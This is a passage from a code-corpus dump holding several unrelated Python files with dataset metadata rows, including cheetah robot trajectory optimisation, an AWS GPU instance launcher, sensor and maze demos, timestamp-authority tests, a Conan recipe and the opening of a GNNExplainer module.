for fe in range(start, stop+1):
# but [short/long] timesteps while on the ground
robot.m.hm[fe].value = robot.m.hm[fe].ub
else:
if init_from_dict['ncp'] == 1:
for fed, cpd in robot.indices(one_based=True):
robot.init_from_dict_one_point(init_from_dict, fed=fed, cpd=cpd, fes=fed-1, cps=0,
skip_if_fixed=True, skip_if_not_None=False, fix=False)
else:
robot.init_from_dict(init_from_dict)
if not (at_angle_d == 0 or at_angle_d is None):
raise ValueError(
f'TODO: rotate init! Got at_angle_d = {at_angle_d}')
for link in robot.links:
for fe, cp in robot.indices(one_based=True):
phi = link['q'][fe, cp, 'phi']
phi.setub(radians(+15))
phi.setlb(radians(-15))
psi = link['q'][fe, cp, 'psi']
psi.setub(radians(+10 + (at_angle_d or 0)))
psi.setlb(radians(-10 + (at_angle_d or 0)))
# bound theta
# stop the back from going so high!
for link in robot.links[:2]: # body
for fe, cp in robot.indices(one_based=True):
link['q'][fe, cp, 'theta'].setub(radians(+45))
link['q'][fe, cp, 'theta'].setlb(radians(-45))
for link in robot.links[2:]: # everything else
for fe, cp in robot.indices(one_based=True):
link['q'][fe, cp, 'theta'].setub(radians(+90))
link['q'][fe, cp, 'theta'].setlb(radians(-90))
# never fallen over
for fe, cp in robot.indices(one_based=True):
body['q'][fe, cp, 'z'].setlb(0.3)
body['q'][fe, cp, 'z'].setub(0.7)
if at_angle_d is None:
# roughly bound to y plane
for fe, cp in robot.indices(one_based=True, skipfirst=False):
body['q'][fe, cp, 'y'].setub(0.2)
body['q'][fe, cp, 'y'].setlb(-0.2)
# average velocity init (overwrite the init!)
for fe, cp in robot.indices(one_based=True, skipfirst=False):
body['q'][fe, cp, 'x'].value = avg_vel * \
total_time * (fe-1 + (cp-1)/ncp)/(nfe-1)
body['dq'][fe, cp, 'x'].value = avg_vel
body['q'][nfe, ncp, 'x'].fix(total_time*avg_vel)
# periodic
periodic(robot, but_not=('x',))
else:
θᵣ = radians(at_angle_d)
# average velocity init (overwrite the init!)
for fe, cp in robot.indices(one_based=True, skipfirst=False):
scale = total_time * (fe-1 + (cp-1)/ncp)/(nfe-1)
body['q'][fe, cp, 'x'].value = avg_vel * scale * cos(θᵣ)
body['dq'][fe, cp, 'x'].value = avg_vel * cos(θᵣ)
body['q'][fe, cp, 'y'].value = avg_vel * scale * sin(θᵣ)
body['dq'][fe, cp, 'y'].value = avg_vel * sin(θᵣ)
#ol.visual.warn('Should probably also bound x, y!')
body['q'][nfe, ncp, 'x'].fix(total_time * avg_vel * cos(θᵣ))
body['q'][nfe, ncp, 'y'].fix(total_time * avg_vel * sin(θᵣ))
# periodic
periodic(robot, but_not=('x', 'y'))
return add_costs(robot, include_transport_cost=False, include_torque_cost=False)
# def set_quad_motor_limits(robot: System3D):
# """
# >>> robot.make_pyomo_model(nfe=10, collocation='implicit_euler', total_time=0.3)
# >>> increase_motor_limits(robot, torque_bound=5., no_load_speed=100.)
# >>> ol.motor.torques(robot)[0]['Tc'].pprint()
# """
# assert robot.m is not None, \
# 'robot.make_pyomo_model() must be called before calling this function'
# motors = {motor.name: motor for motor in ol.motor.torques(robot)}
# def set_lims(name, torque_bound, no_load_speed):
# motor = motors[name]
# for Tc in motor_['Tc'][:, :]:
# Tc.setub(+torque_bound)
# Tc.setlb(-torque_bound)
# if hasattr(motor, 'torque_speed_limit'):
# tsp = motor.torque_speed_limit
# tsp.torque_bounds = (-torque_bound, torque_bound)
# tsp.no_load_speed = no_load_speed
# for name in ("base_B_base_F_torque", "base_B_UBL_torque", "base_B_UBR_torque"):
# set_lims(name, 2.5, 75.)
# for name in ("base_F_UFL_torque", "base_F_UFR_torque"):
# set_lims(name, 2., 150.)
# # for name in ("base_B_tail0_torque", "tail0_tail1_torque"):
# # set_lims(name, TORQUE, SPEED)
# for name in ("UFL_LFL_torque", "UFR_LFR_torque"):
# set_lims(name, 1., 75.)
# for name in ("UBL_LBL_torque", "UBR_LBR_torque"):
# set_lims(name, 0.75, 50.)
def theoretical_peak_power(*,
mass: float,
pct_mass_for_actuation: float = 0.5,
watts_per_kg: float = 600.,
disp: bool = True):
"""
>>> theoretical_peak_power(mass=sum(link.mass for link in robot.links))
"""
peak_power = mass*pct_mass_for_actuation*watts_per_kg
if disp:
print(f'Expected total power of a {mass:.2f} kg cheetah with '
f'{100*pct_mass_for_actuation:.2f}% of mass for actuation '
f'and {watts_per_kg:.2f} W/kg: mass*actuation*watts_per_kg = '
f'{int(peak_power)} W')
return peak_power
def theoretical_peak_angle_velocity(stride_freq_Hz: float = 3.,
total_angle_deg: float = 180.,
disp: bool = True):
"""Cheetah leg moves from 0⁰ -> 90⁰ -> 0⁰ in about 1/3 of a second. Ie, follows the shape:
position(t) = 90/2 * sin(radians(t/0.3 * 360))
where t = 0..0.3
Differentiating with respect to time:
velocity(t) = 90/2 * cos(radians(t/0.3 * 360)) * 360/0.3
Giving a max velocity of
velocity(0) -> 90/2 * 360/0.3 =
Example code:
```python
from math import pi as π
total_angle_deg = 180.
stride_freq_Hz = 3.
t = np.linspace(0, 1/stride_freq_Hz)
pos = lambda t: total_angle_deg/2 * np.sin(t*stride_freq_Hz * 2*π)
plt.plot(t, 10*pos(t), label='position [deg] scaled by 10')
vel = lambda t: total_angle_deg/2 * np.cos(t*stride_freq_Hz * 2*π) * stride_freq_Hz * 2*π
plt.plot(t, vel(t), label='velocity [deg]')
max_ω_deg = total_angle_deg/2 * stride_freq_Hz * 2*π
plt.title(f'total angle change = {total_angle_deg} deg\nmax angular velocity = {max_ω_deg:.1f} deg/s = {np.radians(max_ω_deg):.1f} rad/s')
plt.legend(); plt.show()
```
"""
from math import pi as π, radians
peak = total_angle_deg/2 * stride_freq_Hz * 2*π
if disp:
print(f'Expected peak angular velocity of a leg moving though '
f'{total_angle_deg} degrees at {stride_freq_Hz} Hz:\n'
f'total_angle_deg/2 * stride_freq_Hz * 2*π '
f'= {peak:.2f} deg/s = {radians(peak):.2f} rad/s')
return peak
# def plot_power_values(robot: System3D, power_arr: List[np.ndarray]):
# import matplotlib.pyplot as plt
# peaks = np.sum(
# np.hstack(power_arr),
# axis=1
# )
# total_time = sum(
# robot.m.hm[fe].value for fe in robot.m.fe if fe != 1)*robot.m.hm0.value
# nfe = len(robot.m.fe)
# plt.plot(np.linspace(0, total_time, num=nfe), peaks)
# plt.title(
# f'Total power output of cheetah.\nPeak power: {int(np.max(peaks))} W')
# plt.ylabel('Total power [W]')
# plt.xlabel('time [s]')
# plt.show()
def relative_tail_velocity(cheetah: System3D, plot: bool) -> Dict[Tuple[str, str, str], ndarray]:
import matplotlib.pyplot as plt
from numpy import degrees, array # type: ignore
import numpy as np
base_B = cheetah['base_B']
tail0 = cheetah['tail0']
tail1 = cheetah['tail1']
diffs = {}
for a, b in ((base_B, tail0), (tail0, tail1)):
for ang in ('psi', 'theta'):
vela = array([a['q'][fe, cp, ang].value
for fe, cp in cheetah.indices(one_based=True)])
velb = array([b['q'][fe, cp, ang].value
for fe, cp in cheetah.indices(one_based=True)])
# diff = velb[:,0,idx] - vela[:,0,idx]
diff: np.ndarray = vela - velb
diffs[(a.name, b.name, ang)] = diff
if plot is True:
plt.plot(degrees(vela))
plt.plot(degrees(velb))
plt.plot(degrees(diff))
plt.legend((a.name, b.name, 'diff'))
plt.title(f'{a.name} - {b.name}: {ang}, in degrees/sec')
plt.show()
return diffs
def gather_torque_data(cheetah: System3D, datanames: Iterable[str]) -> Dict[str, List[ndarray]]:
import dill
import pathlib
import numpy as np
from physical_education.motor import torques
data = None
for dataname in datanames:
cheetah.init_from_dict(dill.loads(
pathlib.Path(dataname).read_bytes()),
skip_if_fixed=True, skip_if_not_None=False, fix=False
)
datapoint: Dict[str, np.ndarray] = {
motor.name: motor.save_data_to_dict()['Tc']
for motor in torques(cheetah)
}
if data is None:
data = {k: [] for k in datapoint.keys()}
for k, v in datapoint.items():
data[k].append(v)
assert data is not None
return data
| 40.337563
| 146
| 0.541622
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 11,435
| 0.358993
|
af1dd273f6773d5545946eaa77b49cdb5d3fee31
| 982
|
py
|
Python
|
data_visualization/data_visualization.py
|
or-tal-robotics/mcl_pi
|
02d9b3bdd68c54afde36da320e1ce4bdc8d057d8
|
[
"Apache-2.0"
] | 3
|
2019-05-07T13:48:45.000Z
|
2020-09-02T15:10:35.000Z
|
data_visualization/data_visualization.py
|
or-tal-robotics/MCL_PI
|
02d9b3bdd68c54afde36da320e1ce4bdc8d057d8
|
[
"Apache-2.0"
] | null | null | null |
data_visualization/data_visualization.py
|
or-tal-robotics/MCL_PI
|
02d9b3bdd68c54afde36da320e1ce4bdc8d057d8
|
[
"Apache-2.0"
] | 2
|
2021-01-28T23:34:21.000Z
|
2021-06-29T05:33:35.000Z
|
#!/usr/bin/env python
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
def main():
data_komodo = pd.read_csv('komodo.csv',sep=',')
data_armadillo = pd.read_csv('armadillo.csv',sep=',')
data_visualization(data_komodo)
data_visualization(data_armadillo)
def data_visualization(data):
x = data['1']
ref = np.asarray(data['0'])
err = data['2']
x_temp = []
ref_temp = []
err_temp = []
for ii in range(len(ref)):
x_temp.append(np.fromstring( x[ii][1:-1], dtype=np.float,count=3, sep=' '))
ref_temp.append(np.fromstring( ref[ii][1:-1], dtype=np.float,count=2, sep=' '))
err_temp.append(np.fromstring(err[ii], dtype=np.float))
x = np.array(x_temp)
ref = np.array(ref_temp)
err = np.array(err_temp)
plt.plot(x[:,0],x[:,1])
plt.plot(ref[:,0],ref[:,1])
plt.show()
plt.plot(err)
plt.show()
if __name__ == "__main__":
main()
| 25.179487
| 88
| 0.588595
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 81
| 0.082485
|
af1ff2337c60e542c9bcc64ce74be8ee36948153
| 1,822
|
py
|
Python
|
pyasice/tests/test_tsa.py
|
vgaicuks/pyasice
|
4e955a4aedc319199dfd367d1d092ba99f4fe1c2
|
[
"0BSD"
] | 6
|
2021-02-04T13:15:13.000Z
|
2022-02-04T17:21:40.000Z
|
pyasice/tests/test_tsa.py
|
vgaicuks/pyasice
|
4e955a4aedc319199dfd367d1d092ba99f4fe1c2
|
[
"0BSD"
] | 5
|
2020-10-26T14:43:34.000Z
|
2021-12-27T14:40:10.000Z
|
pyasice/tests/test_tsa.py
|
thorgate/pyasice
|
4423b7251392c7bf6bc5d14800b9b396b8eb2222
|
[
"0BSD"
] | 1
|
2021-07-21T15:36:31.000Z
|
2021-07-21T15:36:31.000Z
|
import hashlib
from unittest.mock import Mock, patch
from asn1crypto.cms import ContentInfo
from asn1crypto.tsp import PKIStatus, PKIStatusInfo, TimeStampResp
from pyasice.tsa import requests, TSA
class MockResponse(Mock):
status_code = 200
headers = {"Content-Type": TSA.RESPONSE_CONTENT_TYPE}
def test_tsa_build_message_imprint():
assert TSA.build_message_imprint(b"test") == {
"hash_algorithm": {"algorithm": "sha256"},
"hashed_message": hashlib.sha256(b"test").digest(),
}
def test_tsa_get_timestamp(demo_ts_response):
tsa = TSA("http://dummy.url")
with patch.object(tsa, "build_ts_request") as mock_build_ts_request:
mock_build_ts_request.return_value = Mock()
mock_build_ts_request.return_value.dump.return_value = "Mock TSA Request"
with patch.object(requests, "post") as mock_post:
mock_post.return_value = response = MockResponse()
response.content = TimeStampResp(
{
"status": PKIStatusInfo(
{
"status": PKIStatus(0),
}
),
"time_stamp_token": ContentInfo.load(demo_ts_response),
}
).dump()
ts_response = tsa.get_timestamp(b"test")
assert isinstance(ts_response, ContentInfo)
mock_build_ts_request.assert_called_once_with(b"test")
mock_post.assert_called_once_with(
"http://dummy.url",
data="Mock TSA Request",
headers={
"Content-Type": TSA.REQUEST_CONTENT_TYPE,
"Connection": "close",
},
)
def test_tsa_existing_response(demo_xml_signature, demo_ts_response):
TSA.verify(demo_ts_response, demo_xml_signature.get_timestamped_message())
| 31.964912
| 81
| 0.63337
| 105
| 0.057629
| 0
| 0
| 0
| 0
| 0
| 0
| 256
| 0.140505
|
af2025817a250b509240a41f88f09a6209dab649
| 317
|
py
|
Python
|
0-python-tutorial/16-forLoops09.py
|
luis2ra/py3-00-w3schools
|
6bb851837f8ef9520491d13fa2c909047c9b18cf
|
[
"MIT"
] | null | null | null |
0-python-tutorial/16-forLoops09.py
|
luis2ra/py3-00-w3schools
|
6bb851837f8ef9520491d13fa2c909047c9b18cf
|
[
"MIT"
] | null | null | null |
0-python-tutorial/16-forLoops09.py
|
luis2ra/py3-00-w3schools
|
6bb851837f8ef9520491d13fa2c909047c9b18cf
|
[
"MIT"
] | null | null | null |
# Demo Python For Loops - Else in For Loop
'''
Else in For Loop
The else keyword in a for loop specifies a block of code to be executed when the loop is finished:
'''
# Print all numbers from 0 to 5, and print a message when the loop has ended:
for x in range(6):
print(x)
else:
print("Finally finished!")
| 24.384615
| 98
| 0.700315
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 263
| 0.829653
|
af223891e643b0660e741c07d3a8f87905708723
| 1,341
|
py
|
Python
|
tests/mazehat/test_view_to_sensehat.py
|
AndrewWasHere/aMAZEing_SenseHat
|
03f0c15f99b6d6c56c2baad4e558799e91fc194a
|
[
"BSD-3-Clause"
] | null | null | null |
tests/mazehat/test_view_to_sensehat.py
|
AndrewWasHere/aMAZEing_SenseHat
|
03f0c15f99b6d6c56c2baad4e558799e91fc194a
|
[
"BSD-3-Clause"
] | null | null | null |
tests/mazehat/test_view_to_sensehat.py
|
AndrewWasHere/aMAZEing_SenseHat
|
03f0c15f99b6d6c56c2baad4e558799e91fc194a
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Copyright 2017, Andrew Lin
All rights reserved.
This software is licensed under the BSD 3-Clause License.
See LICENSE.txt at the root of the project or
https://opensource.org/licenses/BSD-3-Clause
"""
from maze.maze import Maze, Coordinates
from maze.mazehat import MazeHat
def test_view_to_sensehat():
mh = MazeHat()
maze = [
list('#######'),
list(' ##### '),
list('# # # #'),
list(' SHFH '),
list('# # # #'),
list(' ##### '),
list('#######'),
]
view = Maze(maze, 7).view(Coordinates(6, 6))
gold_view = [
mh.wall, mh.wall, mh.wall, mh.wall, mh.wall, mh.wall, mh.wall, mh.empty,
mh.empty, mh.wall, mh.wall, mh.wall, mh.wall, mh.wall, mh.empty, mh.empty,
mh.wall, mh.empty, mh.wall, mh.empty, mh.wall, mh.empty, mh.wall, mh.empty,
mh.empty, mh.empty, mh.start, mh.avatar, mh.finish, mh.hazard, mh.empty, mh.empty,
mh.wall, mh.empty, mh.wall, mh.empty, mh.wall, mh.empty, mh.wall, mh.empty,
mh.empty, mh.wall, mh.wall, mh.wall, mh.wall, mh.wall, mh.empty, mh.empty,
mh.wall, mh.wall, mh.wall, mh.wall, mh.wall, mh.wall, mh.wall, mh.empty,
mh.empty, mh.empty, mh.empty, mh.empty, mh.empty, mh.empty, mh.empty, mh.empty,
]
mview = mh.view_to_sensehat(view)
assert mview == gold_view
| 34.384615
| 90
| 0.59135
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 268
| 0.199851
|
af2278683fee1298b0caf86e836a20709cd9fe8a
| 1,619
|
py
|
Python
|
deploy/gpu/aws/launch_aws.py
|
ysglh/DeepVideoAnalytics
|
ce807cc1595c813250bb4bc7dfc6fb76cd644335
|
[
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | 3
|
2019-03-05T00:46:56.000Z
|
2021-11-26T10:20:40.000Z
|
deploy/gpu/aws/launch_aws.py
|
jiangxu87/DeepVideoAnalytics
|
e401b3273782409b2604657514bec293d6aa75b0
|
[
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
deploy/gpu/aws/launch_aws.py
|
jiangxu87/DeepVideoAnalytics
|
e401b3273782409b2604657514bec293d6aa75b0
|
[
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | 4
|
2021-09-22T07:47:27.000Z
|
2022-01-23T14:16:08.000Z
|
#!/usr/bin/env python
import logging, boto3, subprocess
logging.basicConfig(level=logging.INFO,
format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',
datefmt='%m-%d %H:%M',
filename='../../logs/cloud.log',
filemode='a')
from config import AMI,KeyName,SecurityGroupName,IAM_ROLE,env_user,key_filename
if __name__ == '__main__':
ec2 = boto3.client('ec2')
ec2r = boto3.resource('ec2')
instances = ec2r.create_instances(DryRun=False, ImageId=AMI, KeyName=KeyName, MinCount=1, MaxCount=1,
SecurityGroups=[SecurityGroupName, ], InstanceType="p2.xlarge",
Monitoring={'Enabled': True, },BlockDeviceMappings=[{"DeviceName": "/dev/sda1",
"Ebs" : { "VolumeSize" : 200 }}],
IamInstanceProfile=IAM_ROLE)
for instance in instances:
instance.wait_until_running()
instance.reload()
print(instance.id, instance.instance_type)
logging.info("instance allocated")
with open('host','w') as h:
h.write(instance.public_ip_address)
fh = open("connect.sh", 'w')
fh.write(
"#!/bin/bash\n" + 'autossh -M 0 -o "ServerAliveInterval 30" -o "ServerAliveCountMax 3" -L 8600:localhost:8000 -L 8688:localhost:8888 -i ' + key_filename + " " + env_user + "@" +
instance.public_ip_address + "\n")
fh.close()
subprocess.call(['fab','deploy'])
| 52.225806
| 189
| 0.546016
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 393
| 0.242742
|
af235ba38a9be96557da2c0dd0d6fdf8cdff77b7
| 604
|
py
|
Python
|
Arduino/DFRobot_BMP388-master/DFRobot_BMP388-master/raspbarry/example/I2CReadTemperature/I2CReadTemperature.py
|
giglioq/Ocean-Buoy
|
c30151b7af974733260f57d1d3eefe0a1d63be90
|
[
"MIT"
] | 2
|
2021-06-18T09:34:05.000Z
|
2021-06-18T09:52:18.000Z
|
Arduino/DFRobot_BMP388-master/DFRobot_BMP388-master/raspbarry/example/I2CReadTemperature/I2CReadTemperature.py
|
giglioq/Ocean-Buoy
|
c30151b7af974733260f57d1d3eefe0a1d63be90
|
[
"MIT"
] | null | null | null |
Arduino/DFRobot_BMP388-master/DFRobot_BMP388-master/raspbarry/example/I2CReadTemperature/I2CReadTemperature.py
|
giglioq/Ocean-Buoy
|
c30151b7af974733260f57d1d3eefe0a1d63be90
|
[
"MIT"
] | null | null | null |
# Connect bmp388 and esp32 via I2C.
#
# Warning:
# This demo only supports python3.
# Run this demo : python3 I2CreadTemperature.py
#
# connect:
# raspberry bmp388
# 3.3v(1) VCC
# GND(6) GND
# SCL(5) SCL
# SDA(3) SDA
# BMP388_I2C_ADDR = 0x76: pin SDO is low
# BMP388_I2C_ADDR = 0x77: pin SDO is high
import bmp388
import time
# Create a bmp388 object to communicate with I2C.
bmp388 = bmp388.DFRobot_BMP388_I2C(0x77)
# Read temperature and print it
while 1:
temp = bmp388.readTemperature()
print("Temperature : %s C" %temp)
time.sleep(0.5)
| 22.37037
| 49
| 0.652318
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 441
| 0.730132
|
af24b85975ed6fa9fb7dc53d770b3f47d5edbcbc
| 747
|
py
|
Python
|
shadowsocksr_cli/setting_utils.py
|
fanlix/ssr-command-client
|
3d6884a2c0f360d47825a500942a8d4209705972
|
[
"MIT"
] | 592
|
2020-02-27T16:08:16.000Z
|
2022-03-31T12:14:55.000Z
|
shadowsocksr_cli/setting_utils.py
|
huzhuangwu/ssr-command-client
|
5a47a4fe1e52e28f8ab7e219d7708992f8411c9c
|
[
"MIT"
] | 57
|
2020-03-04T14:36:03.000Z
|
2022-03-27T09:32:30.000Z
|
shadowsocksr_cli/setting_utils.py
|
huzhuangwu/ssr-command-client
|
5a47a4fe1e52e28f8ab7e219d7708992f8411c9c
|
[
"MIT"
] | 179
|
2020-03-05T10:52:16.000Z
|
2022-03-30T13:06:12.000Z
|
"""
@author: tyrantlucifer
@contact: tyrantlucifer@gmail.com
@blog: https://tyrantlucifer.com
@file: setting_utils.py
@time: 2021/2/18 22:42
@desc:
"""
from shadowsocksr_cli.logger import *
class Setting(object):
"""配置项工具类
提供从本地配置文件中读取对应参数的功能
属性:
config: 配置文件对象
"""
config = configparser.ConfigParser()
config.read(init_config.config_file)
def __init__(self):
pass
@staticmethod
def get_value(key):
return Setting.config.get('default', key)
@staticmethod
def set_value(key, value):
Setting.config.set('default', key, str(value))
with open(init_config.config_file, 'w+') as file:
Setting.config.write(file)
| 20.189189
| 58
| 0.621151
| 604
| 0.742927
| 0
| 0
| 289
| 0.355474
| 0
| 0
| 326
| 0.400984
|
af25fd66be9e5c7407f8446bd876b6900df66a06
| 2,037
|
py
|
Python
|
conanfile_installer.py
|
madebr/conan-vulkan_lunarg
|
d805ad7c8628587033140dd8bf458c798f355165
|
[
"MIT"
] | 4
|
2019-06-08T23:54:02.000Z
|
2020-11-10T20:57:54.000Z
|
conanfile_installer.py
|
madebr/conan-lunarg_vulkan_sdk
|
d805ad7c8628587033140dd8bf458c798f355165
|
[
"MIT"
] | 1
|
2019-08-16T13:27:59.000Z
|
2019-08-16T13:27:59.000Z
|
conanfile_installer.py
|
madebr/conan-lunarg_vulkan_sdk
|
d805ad7c8628587033140dd8bf458c798f355165
|
[
"MIT"
] | 2
|
2019-07-30T20:52:50.000Z
|
2020-06-26T11:00:52.000Z
|
# -*- coding: utf-8 -*-
import os
from conanfile_base import ConanFileBase
class ConanFileInstaller(ConanFileBase):
name = "vulkan_lunarg_installer"
exports = ConanFileBase.exports + ["conanfile_base.py"]
settings = "os_build", "arch_build"
_is_installer = True
def package(self):
if self.settings.os_build == "Windows":
base_folder = os.path.join(self.build_folder, self._source_subfolder)
if self.settings.arch_build == "x86":
bin_folder = os.path.join(base_folder, "Bin32")
tools_folder = os.path.join(base_folder, "Tools32")
elif self.settings.arch_build == "x86_64":
bin_folder = os.path.join(base_folder, "Bin")
tools_folder = os.path.join(base_folder, "Tools")
self.copy(pattern="*.exe", dst="bin", src=bin_folder)
self.copy(pattern="*", dst="bin/tools", src=tools_folder)
self.copy(pattern="LICENSE.txt", dst="licenses", src=base_folder)
elif self.settings.os_build == "Linux":
base_folder = os.path.join(self.build_folder, self._source_subfolder)
bin_folder = os.path.join(base_folder, str(self.settings.arch_build), "bin")
self.copy(pattern="*", dst="bin", src=bin_folder)
self.copy(pattern="LICENSE.txt", dst="licenses", src=base_folder)
elif self.settings.os_build == "Macos":
base_folder = os.path.join(self.build_folder, self._source_subfolder, "macOS")
self.copy(pattern="*", dst="bin", src=os.path.join(base_folder, "bin"))
def package_info(self):
self.cpp_info.bindirs = ["bin"]
if self.settings.os_build == "Windows":
self.cpp_info.bindirs.append("bin/tools")
for bindir in self.cpp_info.bindirs:
bindir_fullpath = os.path.join(self.package_folder, bindir)
self.output.info("Appending PATH environment variable: {}".format(bindir_fullpath))
self.env_info.PATH.append(bindir_fullpath)
| 46.295455
| 95
| 0.63623
| 1,958
| 0.961217
| 0
| 0
| 0
| 0
| 0
| 0
| 324
| 0.159057
|
af2638ff33d3fba5e4671ad6ba6d98342710dd02
| 91
|
py
|
Python
|
models/retinanet/__init__.py
|
lihaojia24/pytorch-dt
|
0a8bda73d2055e960ac4840c651b5dff61bc4f5f
|
[
"MIT"
] | null | null | null |
models/retinanet/__init__.py
|
lihaojia24/pytorch-dt
|
0a8bda73d2055e960ac4840c651b5dff61bc4f5f
|
[
"MIT"
] | null | null | null |
models/retinanet/__init__.py
|
lihaojia24/pytorch-dt
|
0a8bda73d2055e960ac4840c651b5dff61bc4f5f
|
[
"MIT"
] | null | null | null |
from .fpn import FPN50
from .net import RetinaNet
from .box_coder import RetinaBoxCoder
| 22.75
| 38
| 0.802198
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
af26de8caba6f5f8de41aa4611f62c733084b68c
| 285
|
py
|
Python
|
function/deco.py
|
git-ning/core-python-programming
|
907ad7071c08086636134fde97f432037f1b824b
|
[
"Apache-2.0"
] | null | null | null |
function/deco.py
|
git-ning/core-python-programming
|
907ad7071c08086636134fde97f432037f1b824b
|
[
"Apache-2.0"
] | null | null | null |
function/deco.py
|
git-ning/core-python-programming
|
907ad7071c08086636134fde97f432037f1b824b
|
[
"Apache-2.0"
] | null | null | null |
#! /usr/bin python
from time import ctime, sleep
def tsfunc (func):
def wrappedFunc():
print '[%s] %s() called' % (ctime(), func.__name__)
return func()
return wrappedFunc
@tsfunc
def foo():
pass
foo()
sleep(4)
for i in range(2):
sleep(1)
foo()
| 14.25
| 59
| 0.582456
| 0
| 0
| 0
| 0
| 27
| 0.094737
| 0
| 0
| 36
| 0.126316
|
af26f7f77af7f12e0aa08bff53add63e6fd4a8b4
| 10,384
|
py
|
Python
|
torch_geometric/nn/models/gnn_explainer.py
|
NucciTheBoss/pytorch_geometric
|
e220a2c08fa1b2f1672d616c22eac2a67b5c8967
|
[
"MIT"
] | 2,350
|
2021-09-12T08:32:50.000Z
|
2022-03-31T18:09:36.000Z
|
torch_geometric/nn/models/gnn_explainer.py
|
NucciTheBoss/pytorch_geometric
|
e220a2c08fa1b2f1672d616c22eac2a67b5c8967
|
[
"MIT"
] | 588
|
2021-09-12T08:49:08.000Z
|
2022-03-31T21:02:13.000Z
|
torch_geometric/nn/models/gnn_explainer.py
|
NucciTheBoss/pytorch_geometric
|
e220a2c08fa1b2f1672d616c22eac2a67b5c8967
|
[
"MIT"
] | 505
|
2021-09-13T13:13:32.000Z
|
2022-03-31T15:54:00.000Z
|
from math import sqrt
from typing import Optional
import torch
from tqdm import tqdm
from torch_geometric.nn.models.explainer import (
Explainer,
clear_masks,
set_masks,
)
EPS = 1e-15
class GNNExplainer(Explainer):
r"""The GNN-Explainer model from the `"GNNExplainer: Generating
Explanations for Graph Neural Networks"
<https://arxiv.org/abs/1903.03894>`_ paper for identifying compact subgraph
structures and small subsets node features that play a crucial role in a
GNN’s node-predictions.
.. note::
For an example of using GNN-Explainer, see `examples/gnn_explainer.py
<https://github.com/pyg-team/pytorch_geometric/blob/master/examples/
gnn_explainer.py>`_.
Args:
model (torch.nn.Module): The GNN module to explain.
epochs (int, optional): The number of epochs to train.
(default: :obj:`100`)
lr (float, optional): The learning rate to apply.
(default: :obj:`0.01`)
num_hops (int, optional): The number of hops the :obj:`model` is
aggregating information from.
If set to :obj:`None`, will automatically try to detect this
information based on the number of
:class:`~torch_geometric.nn.conv.message_passing.MessagePassing`
layers inside :obj:`model`. (default: :obj:`None`)
return_type (str, optional): Denotes the type of output from
:obj:`model`. Valid inputs are :obj:`"log_prob"` (the model
returns the logarithm of probabilities), :obj:`"prob"` (the
model returns probabilities), :obj:`"raw"` (the model returns raw
scores) and :obj:`"regression"` (the model returns scalars).
(default: :obj:`"log_prob"`)
feat_mask_type (str, optional): Denotes the type of feature mask
that will be learned. Valid inputs are :obj:`"feature"` (a single
feature-level mask for all nodes), :obj:`"individual_feature"`
(individual feature-level masks for each node), and :obj:`"scalar"`
(scalar mask for each each node). (default: :obj:`"feature"`)
allow_edge_mask (boolean, optional): If set to :obj:`False`, the edge
mask will not be optimized. (default: :obj:`True`)
log (bool, optional): If set to :obj:`False`, will not log any learning
progress. (default: :obj:`True`)
**kwargs (optional): Additional hyper-parameters to override default
settings in :attr:`~torch_geometric.nn.models.GNNExplainer.coeffs`.
"""
coeffs = {
'edge_size': 0.005,
'edge_reduction': 'sum',
'node_feat_size': 1.0,
'node_feat_reduction': 'mean',
'edge_ent': 1.0,
'node_feat_ent': 0.1,
}
def __init__(self, model, epochs: int = 100, lr: float = 0.01,
num_hops: Optional[int] = None, return_type: str = 'log_prob',
feat_mask_type: str = 'feature', allow_edge_mask: bool = True,
log: bool = True, **kwargs):
super().__init__(model, lr, epochs, num_hops, return_type, log)
assert feat_mask_type in ['feature', 'individual_feature', 'scalar']
self.allow_edge_mask = allow_edge_mask
self.feat_mask_type = feat_mask_type
self.coeffs.update(kwargs)
def _initialize_masks(self, x, edge_index, init="normal"):
(N, F), E = x.size(), edge_index.size(1)
std = 0.1
if self.feat_mask_type == 'individual_feature':
self.node_feat_mask = torch.nn.Parameter(torch.randn(N, F) * std)
elif self.feat_mask_type == 'scalar':
self.node_feat_mask = torch.nn.Parameter(torch.randn(N, 1) * std)
else:
self.node_feat_mask = torch.nn.Parameter(torch.randn(1, F) * std)
std = torch.nn.init.calculate_gain('relu') * sqrt(2.0 / (2 * N))
if self.allow_edge_mask:
self.edge_mask = torch.nn.Parameter(torch.randn(E) * std)
def _clear_masks(self):
clear_masks(self.model)
self.node_feat_masks = None
self.edge_mask = None
def _loss(self, log_logits, prediction, node_idx: Optional[int] = None):
if self.return_type == 'regression':
if node_idx is not None and node_idx >= 0:
loss = torch.cdist(log_logits[node_idx], prediction[node_idx])
else:
loss = torch.cdist(log_logits, prediction)
else:
if node_idx is not None and node_idx >= 0:
loss = -log_logits[node_idx, prediction[node_idx]]
else:
loss = -log_logits[0, prediction[0]]
if self.allow_edge_mask:
m = self.edge_mask.sigmoid()
edge_reduce = getattr(torch, self.coeffs['edge_reduction'])
loss = loss + self.coeffs['edge_size'] * edge_reduce(m)
ent = -m * torch.log(m + EPS) - (1 - m) * torch.log(1 - m + EPS)
loss = loss + self.coeffs['edge_ent'] * ent.mean()
m = self.node_feat_mask.sigmoid()
node_feat_reduce = getattr(torch, self.coeffs['node_feat_reduction'])
loss = loss + self.coeffs['node_feat_size'] * node_feat_reduce(m)
ent = -m * torch.log(m + EPS) - (1 - m) * torch.log(1 - m + EPS)
loss = loss + self.coeffs['node_feat_ent'] * ent.mean()
return loss
def explain_graph(self, x, edge_index, **kwargs):
r"""Learns and returns a node feature mask and an edge mask that play a
crucial role to explain the prediction made by the GNN for a graph.
Args:
x (Tensor): The node feature matrix.
edge_index (LongTensor): The edge indices.
**kwargs (optional): Additional arguments passed to the GNN module.
:rtype: (:class:`Tensor`, :class:`Tensor`)
"""
